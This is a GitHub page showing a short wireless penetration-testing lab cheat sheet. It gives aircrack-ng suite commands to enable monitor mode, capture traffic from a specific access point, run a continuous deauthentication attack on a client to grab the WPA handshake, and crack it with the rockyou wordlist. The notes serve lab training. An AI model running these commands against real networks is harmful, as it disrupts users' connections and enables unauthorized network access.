Skip to content

Latest commit

 

History

History
34 lines (24 loc) · 631 Bytes

WirelessPentestLabs.md

File metadata and controls

34 lines (24 loc) · 631 Bytes

Start wireless to monitor mode

airmon-ng start wlan0

Kill unnessary process

airmon-ng check kill

Scanning Wireless Network

airodump-ng wlan0mon

Sniff WiFi-IT ( Wireless Labs Network) and Waiting Handshake

sudo airodump-ng -c 6 --bssid F0:9F:C2:71:22:12 -w wifi-mobile wlan0mon

Dauth Attack from other terminal and check Sniff session (EAPOL and Handshake Cpature)

sudo aireplay-ng -0 0 -a F0:9F:C2:71:22:12 -c 28:6C:07:6F:F9:43 wlan0mon

Crack Handshake file

aircrack-ng -b F0:9F:C2:71:22:12 -w ./Desktop/rockyou.txt ./wifi-mobile-02.cap